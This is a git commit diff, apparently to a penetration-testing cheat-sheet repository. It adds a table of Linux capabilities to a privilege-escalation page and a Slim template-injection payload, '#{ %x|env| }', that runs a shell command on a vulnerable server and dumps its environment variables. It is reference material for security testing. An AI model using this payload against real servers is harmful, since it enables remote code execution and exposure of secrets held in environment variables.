Slim RCE + CAP list

2024-12-18 18:36:10 +00:00 · 2019-12-05 23:06:53 +01:00 · 2019-12-05 23:06:53 +01:00 · 6f4a28ef66
commit 6f4a28ef66
parent 21101ec287
2 changed files with 26 additions and 0 deletions
--- a/Resources/Linux
+++ b/Resources/Linux
@ -309,6 +309,24 @@ sh-5.0# id
 uid=0(root) gid=1000(swissky)
 ```

+| Capabilities name  | Description |
+|---|---|
+| CAP_AUDIT_CONTROL  | Allow to enable/disable kernel auditing |
+| CAP_AUDIT_WRITE  | Helps to write records to kernel auditing log |
+| CAP_BLOCK_SUSPEND  | This feature can block system suspends   |
+| CAP_CHOWN  | Allow user to make arbitrary change to files UIDs and GIDs |
+| CAP_DAC_OVERRIDE  | This helps to bypass file read, write and execute permission checks |
+| CAP_DAC_READ_SEARCH  | This only bypass file and directory read/execute permission checks  |
+| CAP_FOWNER  | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file  |
+| CAP_KILL  | Allow the sending of signals to processes belonging to others  |
+| CAP_SETGID  | Allow changing of the GID  |
+| CAP_SETUID  | Allow changing of the UID  |
+| CAP_SETPCAP  | Helps to transferring and removal of current set to any PID |
+| CAP_IPC_LOCK  | This helps to lock memory  |
+| CAP_MAC_ADMIN  | Allow MAC configuration or state changes  |
+| CAP_NET_RAW  | Use RAW and PACKET sockets |
+| CAP_NET_BIND_SERVICE  | SERVICE Bind a socket to internet domain privileged ports  |
+
 ## SUDO
 Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)

--- a/Injection/README.md
+++ b/Injection/README.md
@ -85,6 +85,14 @@ Slim:
 <%= Dir.entries('/') %>
 ```

+### Code execution
+
+Execute code using SSTI for Slim engine.
+
+```powershell
+#{ %x|env| }
+```
+
 ## Java

 ### Basic injection